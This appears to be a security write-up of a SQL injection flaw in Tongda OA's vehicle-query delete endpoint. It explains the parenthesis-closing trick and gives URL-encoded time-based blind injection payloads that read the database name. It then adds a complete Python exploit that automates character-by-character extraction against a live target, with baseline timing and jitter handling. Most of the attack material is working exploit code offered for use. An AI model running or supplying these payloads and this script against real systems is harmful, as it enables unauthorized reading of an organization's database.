Tongda OA has a front-end SQL injection vulnerability
Route: general/vehicle/query/delete.php
Injectable parameter: $VU_ID
The code here is very concise: when $VU_ID is not empty, its value is concatenated directly into the SQL statement with no escaping or type check. The injection point sits inside a pair of parentheses in the query, so a payload that begins with "1)" closes the parenthesis the query opened, appends its own conditions, and ends with "and(1)=(1" so that the query's own trailing ")" closes the last parenthesis of the payload. The statement stays syntactically valid, which is how the enclosing parentheses are bypassed.
2. Payload
We can use Cartesian-product (heavy-query) time-based blind injection. The payload below compares the first character of the database name with char(116) and ANDs that comparison with a self-join of information_schema.columns against itself; the self-join is expensive enough to take seconds, and it only has to be evaluated when the comparison is true, so the response is noticeably delayed only for the correct guess. Because the request with 116 was delayed, the first character has ASCII code 116, which is lowercase t. Repeating this for each position, and substituting other expressions for DATABASE(), recovers the database name and any other information the database user is allowed to read.
POC
1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
Extract the second character of the database name the same way: the request with char(100) is delayed, so the second character is the letter d.
POC
1)%20and%20(substr(DATABASE(),2,1))=char(100)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
The third character is _
The fourth character is the letter o
The fifth character is the letter a
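The character-by-character procedure above is tedious by hand, so here is an added Python example (not code from the write-up or from Tongda OA) that builds the same POC payloads for any position and character, measures response time, and walks the database name until no character produces a delay. The base URL is assumed; only the route is from the write-up. The simulated responder and the sample name "td_oa" (the five characters recovered above) are constructed so the script runs offline; http_probe is the live equivalent.

```python
import string
import time
import urllib.request
from urllib.parse import quote

# Assumed base URL; only the route /general/vehicle/query/delete.php is from the write-up.
BASE_URL = "http://oa.example.com/general/vehicle/query/delete.php"

# Heavy subquery: a self-join (Cartesian product) of information_schema.columns that takes
# seconds to evaluate. It is ANDed after the cheap comparison, so MySQL only has to evaluate
# it when the comparison is true, which is what turns a correct guess into a slow response.
HEAVY = "(select count(*) from information_schema.columns A,information_schema.columns B)"

# Letters, digits and underscore cover ordinary MySQL schema names. CHAR() yields a binary
# string, so the comparison is byte-wise (case-sensitive): keep both cases in the charset.
CHARSET = string.ascii_lowercase + string.digits + "_" + string.ascii_uppercase


def build_payload(pos: int, code: int) -> str:
    """Raw VU_ID value that is slow only when the pos-th character of DATABASE()
    has ASCII code `code`. The leading '1)' closes the parenthesis the original
    query opened around the parameter and the trailing 'and(1)=(1' is closed by
    the query's own ')', the same shape as the write-up's POCs."""
    return f"1) and (substr(DATABASE(),{pos},1))=char({code}) and {HEAVY} and(1)=(1"


def build_url(pos: int, code: int) -> str:
    """URL-encode the payload the way the POCs are encoded: spaces become %20,
    the SQL punctuation is left untouched."""
    return f"{BASE_URL}?VU_ID={quote(build_payload(pos, code), safe='()*,=')}"


def http_probe(pos: int, code: int, timeout: float = 30.0) -> float:
    """Send one guess to the (assumed) target and return the elapsed seconds."""
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(build_url(pos, code), timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass  # a timeout or HTTP error still carries the timing signal we need
    return time.perf_counter() - start


def extract_database_name(probe, min_delay: float = 2.0, max_len: int = 64) -> str:
    """Recover DATABASE() one character at a time from response timing.

    `probe(pos, code)` returns elapsed seconds. A guess is a hit when it is at
    least `min_delay` seconds slower than a baseline guess that cannot match
    (ASCII 0). Extraction stops at the first position where no character of
    CHARSET causes a delay, i.e. one past the end of the name.
    """
    baseline = probe(1, 0)
    name = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if probe(pos, ord(ch)) - baseline >= min_delay:
                name += ch
                break
        else:
            break
    return name


def simulated_probe(true_name: str, slow: float = 4.0, fast: float = 0.05):
    """Offline stand-in for http_probe: returns synthetic timings for a database
    whose name is `true_name` (constructed test double; no network, no sleeping)."""
    def probe(pos: int, code: int) -> float:
        return slow if true_name[pos - 1:pos] == chr(code) else fast
    return probe


if __name__ == "__main__":
    # "td_oa" is a constructed sample made of the five characters the write-up recovered.
    print(extract_database_name(simulated_probe("td_oa")))
    # Against a live target (assumed URL above): extract_database_name(http_probe)
```

build_url(1, 116) reproduces the first POC exactly. Network jitter is handled by comparing each guess against a baseline request instead of a fixed cut-off; on a slow target raise min_delay or repeat each hit before accepting it.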